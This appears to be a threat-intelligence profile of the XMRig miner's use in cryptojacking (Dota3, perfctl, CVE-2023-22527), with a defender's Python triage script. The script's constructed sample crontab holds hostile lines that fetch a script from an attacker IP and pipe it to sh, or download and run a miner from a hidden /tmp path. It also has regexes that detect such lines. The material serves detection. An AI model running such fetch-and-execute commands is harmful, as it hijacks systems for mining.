Xmrig

Software updated 9 months ago (2024-10-17T12:07:11.133Z)
XMRig is an open-source, high-performance mining program for cryptocurrencies, chiefly Monero (XMR). It is legitimate software, but it has been repurposed in many intrusions for cryptojacking: the attacker installs it on compromised systems and spends their CPU time mining into the attacker's wallet.

One reported deployment pattern starts with a dropper that orchestrates the installation and execution of two legitimate applications, the I2P tooling (i2pd) and the XMRig miner. The dropper retrieves a custom XMRig build over I2P and manages the mining operation. Both i2pd and XMRig are written to legitimate-looking file paths to mask their execution, which makes detection harder.

The main impact of these attacks is resource hijacking: the miner exhausts the server's CPU. This holds whether the payload is third-party proxyware or the XMRig Monero miner that the perfctl malware drops onto a compromised server. Once the attacker has assembled a botnet, they can use it for further profitable activity such as cryptocurrency mining, DDoS attacks, spam distribution, and data theft.

The Dota3 botnet, known for cryptojacking, deploys XMRig agents to compromised systems, so its primary purpose is crypto mining. Its attack process has several steps. First, a "check.sh" script creates the directories it needs and checks whether the host has already been infected. If the host is not yet infected, it downloads "config.sh" from the attacker's IP and the XMRig miner from GitHub. The miner's "config.json" sets the pool URL and the credentials (the wallet the pool pays out to) used for mining. For persistence the attacker installs multiple cron jobs, re-downloads the XMRig miner, and disables security tools before starting to mine.

A notable example is the exploitation of the critical Atlassian Confluence vulnerability CVE-2023-22527 for cryptojacking, as reported by Trend Micro. After ensuring all cloud monitoring and security services are terminated or deleted, the attacker kills the entry-point process that exploited CVE-2023-22527 and downloads the XMRig miner to begin mining.
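The following Python script is an added example for this page, not code from XMRig, the Dota3 botnet, perfctl, or any of the cited reports. It models three of the artefacts described above so a responder can triage them: a cron entry that re-fetches a miner from an attacker IP or GitHub, an XMRig config.json naming a pool and wallet, and a miner running from a disguised path. The crontab, the config.json, the wallet string, the pool hostname, the attacker IP and the "kworkerds" process name are all constructed for illustration, and the detection thresholds and regexes are assumptions a defender would tune for their own environment.

```python
"""Triage helpers for the XMRig cryptojacking artefacts described above.

Added example written for this page; not code from XMRig, the Dota3 botnet,
perfctl, or any vendor report. All sample inputs, names, addresses and
detection rules are constructed assumptions for illustration.
"""
from __future__ import annotations

import json
import re

# Standard Monero address: 95 base58 chars starting with 4 (or 8 for a subaddress).
MONERO_ADDR_RE = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")
# Cron command that fetches something over HTTP(S) with curl or wget ...
CRON_FETCH_RE = re.compile(r"\b(curl|wget)\b[^|&;]*\bhttps?://")
# ... and pipes the download straight into a shell.
CRON_PIPE_SH_RE = re.compile(r"\|\s*(ba)?sh\b")
# Dot-prefixed directory under a world-writable location, a common hiding spot.
HIDDEN_TMP_RE = re.compile(r"/(tmp|var/tmp|dev/shm)/\.")

# --- constructed sample inputs (not real indicators) -------------------------
FAKE_WALLET = "4" + "AdKq3x7" * 13 + "BcD"  # 95 chars, valid base58 shape
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update -qq
*/5 * * * * curl -fsSL http://203.0.113.10/config.sh | sh
@reboot wget -q -O /tmp/.x/xmrig https://github.com/example/example/releases/download/v1/xmrig && chmod +x /tmp/.x/xmrig && /tmp/.x/xmrig
"""
# Real XMRig config.json keys (pools[].url/user/pass, donate-level) with made-up values.
SAMPLE_CONFIG = json.dumps({
    "autosave": True,
    "donate-level": 1,
    "cpu": {"enabled": True, "huge-pages": True},
    "pools": [{"url": "pool.example.net:3333", "user": FAKE_WALLET,
               "pass": "x", "keepalive": True, "tls": False}],
})
SAMPLE_CMDLINES = [
    # miner renamed to blend in, but the XMRig pool/user flags give it away
    f"/usr/bin/kworkerds -o pool.example.net:3333 -u {FAKE_WALLET} -p x --donate-level=1",
    "/usr/sbin/sshd -D",
]


def suspicious_cron_entries(crontab: str) -> list[str]:
    """Return cron lines that download and run remote content or mention xmrig."""
    hits = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fetches_remote = bool(CRON_FETCH_RE.search(line))
        pipes_to_shell = bool(CRON_PIPE_SH_RE.search(line))
        hidden_path = bool(HIDDEN_TMP_RE.search(line))
        if (fetches_remote and (pipes_to_shell or hidden_path)) or "xmrig" in line.lower():
            hits.append(line)
    return hits


def classify_miner_config(text: str) -> dict:
    """Parse a candidate XMRig config.json and pull out pool URLs and wallets."""
    try:
        cfg = json.loads(text)
    except json.JSONDecodeError:
        return {"is_xmrig_config": False, "reason": "not JSON"}
    pools = cfg.get("pools") if isinstance(cfg, dict) else None
    if not isinstance(pools, list) or not pools:
        return {"is_xmrig_config": False, "reason": "no pools array"}
    entries = [p for p in pools if isinstance(p, dict)]
    users = [str(p.get("user", "")) for p in entries]
    return {
        "is_xmrig_config": True,
        "pool_urls": [str(p.get("url", "")) for p in entries],
        # the wallet is the durable indicator; binary names and paths change freely
        "monero_wallets": [u for u in users if MONERO_ADDR_RE.match(u)],
        "donate_level": cfg.get("donate-level"),
    }


def looks_like_xmrig_cmdline(cmdline: str) -> bool:
    """Flag a process by XMRig's own option vocabulary, not by its (renamable) name."""
    argv = cmdline.split()
    if not argv:
        return False
    if argv[0].rsplit("/", 1)[-1].lower() == "xmrig":
        return True
    flags = {a.split("=", 1)[0] for a in argv[1:]}
    has_pool = bool(flags & {"-o", "--url"})
    has_user = bool(flags & {"-u", "--user"})
    has_wallet = any(MONERO_ADDR_RE.match(a) for a in argv[1:])
    return (has_pool and has_user) or "--donate-level" in flags or has_wallet


def triage() -> dict:
    """Run all three checks over the constructed samples and summarise."""
    return {
        "cron_hits": suspicious_cron_entries(SAMPLE_CRONTAB),
        "config": classify_miner_config(SAMPLE_CONFIG),
        "miner_processes": [c for c in SAMPLE_CMDLINES if looks_like_xmrig_cmdline(c)],
    }


if __name__ == "__main__":
    print(json.dumps(triage(), indent=2))
```

The option names the process check keys on (`-o/--url`, `-u/--user`, `-p/--pass`, `--donate-level`) and the `pools[].url/user/pass` and `donate-level` keys in config.json are XMRig's real ones; everything else in the sample data is made up. On a live host the same functions would be fed the output of `crontab -l` for each user plus the system cron directories, any config.json found next to a high-CPU process, and `/proc/<pid>/cmdline`, which is where a renamed miner under a legitimate-looking path still has to expose its pool and wallet.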
Description last updated: 2024-10-17T12:07:11.108Z
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
Alias (votes): description
Xmrig Miner (8 votes): Xmrig Miner is a possible alias for Xmrig. XMRig Miner is an open-source CPU/GPU miner software that supports numerous protocols. It's used in various cyber-attack campaigns to execute mining activities, often through the use of a dropper. The dropper is responsible for orchestrating the installation and execution of the legitimate applicati
Xmrig Crypto Miner (3 votes): Xmrig Crypto Miner is a possible alias for Xmrig. XMRig is a high-performance, open-source cryptocurrency mining software that allows users to mine Monero (XMR), among other cryptocurrencies. The software has been identified in several instances of unauthorized crypto-mining activities, often used in conjunction with other malicious software to exp
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Malware
Xmrig Miner
Payload
Cryptominer
Botnet
Linux
SSH
Ddos
Bot
Vulnerability
Exploit
Loader
Macos
Docker
Xmrig Crypto...
Windows
Github
Cron
PowerShell
Source
Python
Backdoor
Rootkit
Ddos Botnet
Trojan
Dropper
Downloader
Associated Malware
Malware (association type; votes): description
Shellbot (Unspecified; 2 votes): The Shellbot Malware is associated with Xmrig. ShellBot is a malicious software (malware) variant that has been actively targeting poorly managed Linux SSH servers. As reported by Hacker News and HackRead in March 2023, this Perl-based DDoS bot deploys different variants to exploit these servers. ShellBot, along with another DDoS malware called
Rapperbot (Unspecified; 2 votes): The Rapperbot Malware is associated with Xmrig. RapperBot is a malicious software (malware) identified as a Distributed Denial of Service (DDoS) botnet first encountered by Fortinet in mid-June 2022. This malware, which brute-forces its way into Internet of Things (IoT) devices, primarily targeted Linux SSH servers. RapperBot is unique in that wh
Associated Vulnerabilities
Vulnerability (association type; votes): description
CVE-2023-22527 (Unspecified; 3 votes): The CVE-2023-22527 Vulnerability is associated with Xmrig. CVE-2023-22527 is a critical vulnerability found in Atlassian's Confluence Server and Data Center. This flaw, rated 10 out of 10 on the CVSS v3 scale, is a template injection issue that allows an unauthenticated attacker to execute remote code. The vulnerability specifically affects outdated version
Source Document References
Information about the Xmrig Software was read from the documents corpus below. This display is limited to 20 results.
Source (created)
Securityaffairs (9 months ago)
DARKReading (9 months ago)
Contagio (9 months ago)
SANS ISC (10 months ago)
Fortinet (10 months ago)
Securityaffairs (10 months ago)
DARKReading (10 months ago)
Trend Micro (10 months ago)
DARKReading (a year ago)
BankInfoSecurity (a year ago)
Securityaffairs (a year ago)
Trend Micro (a year ago)
DARKReading (a year ago)
CERT-EU (a year ago)
Securityaffairs (a year ago)
Trend Micro (a year ago)
Securityaffairs (a year ago)
Securityaffairs (a year ago)
DARKReading (a year ago)
CERT-EU (a year ago)